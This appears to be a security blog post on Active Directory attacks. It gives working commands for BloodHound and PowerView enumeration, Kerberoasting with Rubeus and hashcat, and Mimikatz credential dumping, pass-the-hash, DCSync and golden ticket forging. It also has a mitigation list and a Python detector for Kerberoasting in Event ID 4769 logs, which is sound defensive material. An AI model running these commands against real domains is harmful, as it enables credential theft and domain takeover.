Active Directory (AD) remains a prime target for attackers due to its central role in managing identities and access in enterprise environments. Security professionals must understand common attack techniques to defend against them effectively. This guide covers reconnaissance, exploitation, privilege escalation, and lateral movement tactics, along with detection and mitigation strategies.
You Should Know: Practical Techniques & Commands
1. AD Reconnaissance with BloodHound & PowerView
Attackers use tools like BloodHound and PowerView to map AD environments and identify attack paths.
BloodHound Setup & Usage:
    # Install BloodHound on Kali Linux
    sudo apt update && sudo apt install bloodhound
    # Start Neo4j (BloodHound database)
    sudo neo4j start
    # Ingest data using SharpHound (Windows)
    .\SharpHound.exe -c All --zipfilename ad_data
PowerView Commands for Enumeration:
    # Get all domain users
    Get-NetUser | Select-Object samaccountname
    # Find privileged groups (wildcard match on the group name)
    Get-NetGroup -GroupName *admin*
    # Check for misconfigured ACLs
    Get-ObjectAcl -Identity "Domain Admins" -ResolveGUIDs
2. Exploiting Misconfigurations & Privilege Escalation
Common misconfigurations include unconstrained delegation, weak service permissions, and excessive privileges.
Kerberoasting Attack (Extracting Service Account Hashes):
    # Request all SPN tickets
    Add-Type -AssemblyName System.IdentityModel
    # List every registered SPN in the domain (the */* wildcard is required)
    setspn -T DOMAIN.LOCAL -Q */*
    # Extract hashes with Rubeus
    .\Rubeus.exe kerberoast /outfile:hashes.txt
Cracking Hashes with Hashcat:
    hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
3. Pass-the-Hash & Golden Ticket Attacks
Attackers use stolen credentials to move laterally.
Pass-the-Hash (PtH) with Mimikatz:
    # Dump hashes
    .\mimikatz.exe "sekurlsa::logonpasswords"
    # Pass-the-Hash attack
    .\mimikatz.exe "sekurlsa::pth /user:admin /domain:DOMAIN /ntlm:HASH"
Golden Ticket Attack:
    # Extract KRBTGT hash
    .\mimikatz.exe "lsadump::dcsync /domain:DOMAIN /user:krbtgt"
    # Forge Golden Ticket
    .\mimikatz.exe "kerberos::golden /user:fakeadmin /domain:DOMAIN /sid:S-1-5-21-... /krbtgt:HASH /ptt"
4. Detecting & Mitigating AD Attacks
- Enable Windows Event Logs for suspicious activities (Event ID 4769, Kerberos service ticket requests, for Kerberoasting).
- Restrict Service Account Permissions (Least Privilege Principle).
- Implement LAPS (Local Administrator Password Solution) to prevent lateral movement.
- Monitor for Anomalous Logins with SIEM tools (Splunk, ELK).
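Added example, not part of the original post: a small detection pass over constructed Event ID 4769 records that flags the Kerberoasting pattern mentioned above (RC4-HMAC, encryption type 0x17, ticket requests for many distinct service accounts from one user in a short window). Field names, thresholds and the sample records are assumptions for illustration.

```python
"""Flag Kerberoasting-style TGS request patterns in Windows Event ID 4769 records.

Heuristics (constructed example):
  - Ticket Encryption Type 0x17 (RC4-HMAC) requested for a service account;
    Kerberoasting tools request RC4 because those hashes crack far faster than AES.
  - One account requesting tickets for several distinct service principals
    within a short time window.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # Ticket Encryption Type value for RC4-HMAC in 4769 events

# Constructed sample records, shaped like the fields a SIEM extracts from 4769.
SAMPLE_4769 = [
    {"time": "2024-05-01T10:00:01", "account": "jdoe@DOMAIN.LOCAL", "service": "svc_sql", "enc": "0x12", "status": "0x0"},
    {"time": "2024-05-01T10:01:30", "account": "jdoe@DOMAIN.LOCAL", "service": "svc_legacy", "enc": "0x17", "status": "0x0"},
    {"time": "2024-05-01T10:02:00", "account": "WS01$@DOMAIN.LOCAL", "service": "svc_http", "enc": "0x17", "status": "0x0"},
    {"time": "2024-05-01T10:05:00", "account": "tmp.user@DOMAIN.LOCAL", "service": "svc_sql", "enc": "0x17", "status": "0x0"},
    {"time": "2024-05-01T10:05:20", "account": "tmp.user@DOMAIN.LOCAL", "service": "svc_http", "enc": "0x17", "status": "0x0"},
    {"time": "2024-05-01T10:05:41", "account": "tmp.user@DOMAIN.LOCAL", "service": "svc_backup", "enc": "0x17", "status": "0x0"},
    {"time": "2024-05-01T10:05:50", "account": "tmp.user@DOMAIN.LOCAL", "service": "svc_ftp", "enc": "0x17", "status": "0x1F"},
    {"time": "2024-05-01T10:20:00", "account": "tmp.user@DOMAIN.LOCAL", "service": "svc_legacy", "enc": "0x17", "status": "0x0"},
]


def is_service_target(service: str) -> bool:
    """krbtgt and machine accounts ($) appear in normal traffic; ignore them."""
    return service.lower() != "krbtgt" and not service.endswith("$")


def find_kerberoast_candidates(events, window=timedelta(minutes=5), threshold=3):
    """Return {account: sorted services} for accounts that obtained RC4 tickets for
    at least `threshold` distinct service accounts within `window`.
    Only successful requests (Failure Code 0x0) count."""
    per_account = defaultdict(list)
    for e in events:
        if e["status"] != "0x0" or e["enc"] != RC4_HMAC or not is_service_target(e["service"]):
            continue
        per_account[e["account"]].append((datetime.fromisoformat(e["time"]), e["service"]))
    hits = {}
    for account, reqs in per_account.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # sliding window starting at each request
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(in_window) >= threshold:
                hits[account] = sorted(in_window)
                break
    return hits


if __name__ == "__main__":
    for account, services in find_kerberoast_candidates(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {account}: {services}")
```

A single RC4 request from a user (the legacy application case) and machine-account traffic do not trigger the rule, so tune the threshold and window against your own baseline before alerting on it.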
What Undercode Says
Active Directory security is critical in modern enterprises. Attackers continuously evolve techniques, making proactive defense essential. Regular audits, hardening AD configurations, and monitoring for anomalies can significantly reduce risks.
Key Commands Recap:
- BloodHound: Map AD attack paths.
- PowerView: Enumerate users, groups, and permissions.
- Mimikatz: Extract credentials and perform PtH attacks.
- Hashcat: Crack stolen hashes.
- LAPS: Mitigate lateral movement risks.
Stay updated with AD security best practices to defend against evolving threats.
Expected Output:
A fortified AD environment with minimized attack surfaces, continuous monitoring, and rapid incident response capabilities.
Further Reading:
- Microsoft AD Security Best Practices
- BloodHound Official Documentation
- Mitre ATT&CK: Active Directory Attacks
References:
Reported By: Dharamveer Prasad – Hackers Feeds